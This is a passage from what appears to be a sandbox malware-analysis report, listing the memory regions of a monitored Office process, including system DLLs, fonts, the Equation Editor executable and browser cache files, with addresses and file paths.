files\\content.word\\~wrf{190c32d0-061d-4fbd-bc5a-b64a94267731}.tmp") Region: id = 741 start_va = 0x752c0000 end_va = 0x752e1fff monitored = 0 entry_point = 0x752c53e9 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 757 start_va = 0x64a0000 end_va = 0x6524fff monitored = 0 entry_point = 0x64ecd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 861 start_va = 0x240000 end_va = 0x241fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 862 start_va = 0x350000 end_va = 0x351fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 863 start_va = 0x360000 end_va = 0x360fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 892 start_va = 0x64a0000 end_va = 0x656bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 893 start_va = 0x8950000 end_va = 0x8d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008950000" filename = "" Region: id = 894 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 895 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 896 start_va = 0x77120000 end_va = 0x77122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 897 start_va = 0x360000 end_va = 0x360fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 898 start_va = 0x752b0000 end_va = 0x752b8fff monitored = 0 entry_point = 0x752b153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 899 start_va = 0x75240000 end_va = 0x752affff monitored = 0 entry_point = 0x75241f65 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 900 start_va = 0x751f0000 end_va = 0x75206fff monitored = 0 entry_point = 0x751f35fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 901 start_va = 0x64dd0000 end_va = 0x64e0cfff monitored = 0 entry_point = 0x64dd10f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 902 start_va = 0x64db0000 end_va = 0x64dc8fff monitored = 0 entry_point = 0x64db1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 903 start_va = 0x75230000 end_va = 0x7523afff monitored = 0 entry_point = 0x75231200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 904 start_va = 0x3890000 end_va = 0x38cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003890000" filename = "" Region: id = 905 start_va = 0x8e20000 end_va = 0x8f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e20000" filename = "" Region: id = 906 start_va = 0x7ef6d000 end_va = 0x7ef6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef6d000" filename = "" Region: id = 907 start_va = 0x8f20000 end_va = 0x971ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f20000" filename = "" Region: id = 908 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 909 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 910 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 911 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 912 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 913 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 914 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 915 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 916 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 917 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 918 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 919 start_va = 0x8d10000 end_va = 0x8e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d10000" filename = "" Region: id = 920 start_va = 0x8d10000 end_va = 0x8e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d10000" filename = "" Region: id = 921 start_va = 0x8d10000 end_va = 0x8e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d10000" filename = "" Region: id = 922 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 923 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 924 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 925 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 926 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 927 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 928 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 929 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 930 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 931 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 932 start_va = 0x8d10000 end_va = 0x8e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d10000" filename = "" Region: id = 933 start_va = 0x8d10000 end_va = 0x8e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d10000" filename = "" Region: id = 934 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 935 start_va = 0x3d0000 end_va = 0x3d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 936 start_va = 0x3e0000 end_va = 0x3e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 937 start_va = 0x8d10000 end_va = 0x8e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d10000" filename = "" Region: id = 938 start_va = 0x9720000 end_va = 0x97e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 939 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 940 start_va = 0x490000 end_va = 0x491fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 941 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 942 start_va = 0x4b0000 end_va = 0x4b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 943 start_va = 0x97f0000 end_va = 0x98bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "timesbd.ttf" filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf") Region: id = 944 start_va = 0x97f0000 end_va = 0x98bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "timesbd.ttf" filename = "\\Windows\\Fonts\\timesbd.ttf" (normalized: "c:\\windows\\fonts\\timesbd.ttf") Region: id = 945 start_va = 0x98c0000 end_va = 0x9979fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibril.ttf" filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf") Region: id = 946 start_va = 0x4c0000 end_va = 0x4c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 947 start_va = 0x4d0000 end_va = 0x4d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 948 start_va = 0x9980000 end_va = 0x9a54fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrili.ttf" filename = "\\Windows\\Fonts\\CalibriLI.ttf" (normalized: "c:\\windows\\fonts\\calibrili.ttf") Region: id = 949 start_va = 0x4e0000 end_va = 0x4e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 950 start_va = 0x1130000 end_va = 0x1131fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 951 start_va = 0x1180000 end_va = 0x1181fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 952 start_va = 0x34d0000 end_va = 0x34d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 953 start_va = 0x3660000 end_va = 0x3660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 954 start_va = 0x3670000 end_va = 0x3671fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 955 start_va = 0x3680000 end_va = 0x3681fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 956 start_va = 0x9a60000 end_va = 0x9b30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 963 start_va = 0x3760000 end_va = 0x3761fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 964 start_va = 0x37c0000 end_va = 0x37c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037c0000" filename = "" Region: id = 965 start_va = 0x37e0000 end_va = 0x37e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 966 start_va = 0x9b40000 end_va = 0x9bf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "arialbd.ttf" filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf") Region: id = 973 start_va = 0x63260000 end_va = 0x6329afff monitored = 0 entry_point = 0x632756aa region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msproof7.dll") Region: id = 974 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "custom.dic" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\uproof\\custom.dic") Region: id = 976 start_va = 0x631f0000 end_va = 0x63253fff monitored = 0 entry_point = 0x631f68c8 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\proof\\1033\\msgr8en.dll") Region: id = 997 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 999 start_va = 0x3d0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1000 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1001 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1002 start_va = 0x4c0000 end_va = 0x4c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1003 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1004 start_va = 0x1180000 end_va = 0x1180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 1005 start_va = 0x3670000 end_va = 0x3670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 1006 start_va = 0x36d0000 end_va = 0x36d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 1014 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1016 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1017 start_va = 0x61e70000 end_va = 0x61e94fff monitored = 0 entry_point = 0x61e72b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1018 start_va = 0x61e60000 end_va = 0x61e6afff monitored = 0 entry_point = 0x61e652a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1019 start_va = 0x61df0000 end_va = 0x61e50fff monitored = 0 entry_point = 0x61e2bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\SysWOW64\\wbemcomn2.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn2.dll") Region: id = 1020 start_va = 0x61de0000 end_va = 0x61deefff monitored = 0 entry_point = 0x61de93d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1380 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1381 start_va = 0x61d30000 end_va = 0x61dd5fff monitored = 0 entry_point = 0x61d9a2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1382 start_va = 0x61d10000 end_va = 0x61d27fff monitored = 0 entry_point = 0x61d11335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 1383 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1384 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1385 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1386 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1387 start_va = 0x9890000 end_va = 0x98cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009890000" filename = "" Region: id = 1388 start_va = 0x9c50000 end_va = 0x9d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c50000" filename = "" Region: id = 1389 start_va = 0x7ef6a000 end_va = 0x7ef6cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef6a000" filename = "" Region: id = 1390 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1391 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1392 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1393 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1402 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1505 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1973 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1974 start_va = 0x66a20000 end_va = 0x66a77fff monitored = 0 entry_point = 0x66a213b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1975 start_va = 0x669d0000 end_va = 0x66a1efff monitored = 0 entry_point = 0x669d1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 1976 start_va = 0x74420000 end_va = 0x7443bfff monitored = 0 entry_point = 0x7442a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1977 start_va = 0x74410000 end_va = 0x74416fff monitored = 0 entry_point = 0x7441128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1978 start_va = 0x75220000 end_va = 0x7522cfff monitored = 0 entry_point = 0x75222012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1979 start_va = 0x669b0000 end_va = 0x669c1fff monitored = 0 entry_point = 0x669b3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1980 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1981 start_va = 0x75210000 end_va = 0x75217fff monitored = 0 entry_point = 0x752134d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 1982 start_va = 0x743c0000 end_va = 0x743fbfff monitored = 0 entry_point = 0x743c145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1983 start_va = 0x743b0000 end_va = 0x743b4fff monitored = 0 entry_point = 0x743b15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1984 start_va = 0x743a0000 end_va = 0x743a5fff monitored = 0 entry_point = 0x743a1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1985 start_va = 0x4c0000 end_va = 0x4c7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 1990 start_va = 0x37b0000 end_va = 0x37b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037b0000" filename = "" Region: id = 1991 start_va = 0x37d0000 end_va = 0x37dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1992 start_va = 0x37f0000 end_va = 0x37f7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1993 start_va = 0x3800000 end_va = 0x380ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1994 start_va = 0x74440000 end_va = 0x74483fff monitored = 0 entry_point = 0x744563f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2011 start_va = 0x98d0000 end_va = 0x9aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000098d0000" filename = "" Region: id = 2023 start_va = 0x74240000 end_va = 0x74291fff monitored = 0 entry_point = 0x742414be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 2024 start_va = 0x74220000 end_va = 0x74234fff monitored = 0 entry_point = 0x742212de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 2025 start_va = 0x74210000 end_va = 0x7421cfff monitored = 0 entry_point = 0x74211326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 2026 start_va = 0x98e0000 end_va = 0x991ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000098e0000" filename = "" Region: id = 2027 start_va = 0x9a70000 end_va = 0x9aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a70000" filename = "" Region: id = 2028 start_va = 0x9e60000 end_va = 0x9f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 2029 start_va = 0x7ef67000 end_va = 0x7ef69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef67000" filename = "" Region: id = 2030 start_va = 0x3810000 end_va = 0x3810fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003810000" filename = "" Region: id = 2031 start_va = 0x3810000 end_va = 0x3810fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003810000" filename = "" Region: id = 2032 start_va = 0x74200000 end_va = 0x74205fff monitored = 0 entry_point = 0x7420125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 2034 start_va = 0x3b10000 end_va = 0x3b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b10000" filename = "" Region: id = 2035 start_va = 0x9920000 end_va = 0x9a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009920000" filename = "" Region: id = 2036 start_va = 0x74310000 end_va = 0x74315fff monitored = 0 entry_point = 0x743114b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2048 start_va = 0x742d0000 end_va = 0x74307fff monitored = 0 entry_point = 0x742d990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2052 start_va = 0x9f60000 end_va = 0xa0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f60000" filename = "" Region: id = 2053 start_va = 0x66970000 end_va = 0x669aefff monitored = 0 entry_point = 0x66972351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 2056 start_va = 0x668a0000 end_va = 0x66961fff monitored = 0 entry_point = 0x668a119a region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 2058 start_va = 0xa100000 end_va = 0xa8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a100000" filename = "" Region: id = 2059 start_va = 0x3860000 end_va = 0x386ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003860000" filename = "" Region: id = 2127 start_va = 0x66850000 end_va = 0x66887fff monitored = 0 entry_point = 0x66851489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 2128 start_va = 0x3e0000 end_va = 0x3e9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 2129 start_va = 0x99f0000 end_va = 0x9a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000099f0000" filename = "" Region: id = 2130 start_va = 0xa960000 end_va = 0xaa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a960000" filename = "" Region: id = 2131 start_va = 0x7ef64000 end_va = 0x7ef66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef64000" filename = "" Region: id = 2132 start_va = 0x66830000 end_va = 0x66845fff monitored = 0 entry_point = 0x66832061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 2133 start_va = 0x3860000 end_va = 0x386ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003860000" filename = "" Region: id = 2154 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 